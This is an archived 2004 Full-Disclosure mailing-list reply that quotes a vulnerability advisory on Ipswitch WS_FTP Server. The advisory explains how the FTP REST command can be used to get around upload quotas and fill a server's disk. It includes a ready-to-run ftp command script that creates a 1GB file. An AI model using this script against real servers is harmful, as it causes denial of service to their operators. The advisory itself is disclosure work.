[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Re: How to crash a harddisk - the Ipswitch WS_FTP Server way

To: Hugh Mann <hughmann@xxxxxxxxxxx>
Subject: [Full-Disclosure] Re: How to crash a harddisk - the Ipswitch WS_FTP Server way
From: exon <exon@xxxxxxx>
Date: Wed, 24 Mar 2004 00:19:49 +0100

This is old news.
It is also RFC compliant behaviour, even though admitted silly.

/exon

Hugh Mann wrote:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Advisory Name: How to crash a harddisk - the Ipswitch WS_FTP Server way Impact : Denial of Service Discovered by: Hugh Mann hughmann@xxxxxxxxxxx Tested progs : Ipswitch WS_FTP Server 4.0.2.EVAL ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Description ~~~~~~~~~~~ It's possible for any user with write access to a directory, even when there's a limit to how much data the user can upload, to use up all available disk space on any partition it can upload to. Even a slow modem user can do this because the user only needs to send a few bytes to the server.

Details ~~~~~~~ The REST command is used to change the file pointer where new data will be written to the file next time the user sends an upload command such as STOR. A user can create arbitrary sized files (up to 2^64-1 bytes) by specifying a large value as the argument to REST and then sending a small file with STOR.

WS_FTP Server doesn't count the extra bytes starting from the end of the original file to the new file pointer location when checking if the user can upload more bytes. The next time the user tries to upload a file, WS_FTP Server will give an error.

Exploit ~~~~~~~ Save this in a file called ftpcmds.txt, after changing the FTP server name, username, and password.
<<<<<<<<<<<<
open ftp.server.mob
username
password
!echo.>2byte.txt
!echo.>2byte_2.txt
dir
put 2byte_2.txt
dir
del 2byte_2.txt
quote REST 1073741822
put 2byte.txt
dir
put 2byte_2.txt
del 2byte.txt
del 2byte_2.txt
!del 2byte.txt
!del 2byte_2.txt
quit
Then start it:

C:\>ftp -s:ftpcmds.txt

to see the result. It will create a 1GB file and then delete it.

_________________________________________________________________ Is your PC infected? Get a FREE online computer virus scan from McAfee® Security. http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- [Full-Disclosure] How to crash a harddisk - the Ipswitch WS_FTP Server way
  - From: Hugh Mann

Prev by Date: Re: [Full-Disclosure] Re: Advisory 03/2004: Multiple (13) Ethereal remote overflows
Next by Date: Re: [Full-Disclosure] Telnet Sniff Problems
Previous by thread: [Full-Disclosure] How to crash a harddisk - the Ipswitch WS_FTP Server way
Next by thread: [Full-Disclosure] Open the WS_FTP Server backdoor to SYSTEM
Index(es):
- Date
- Thread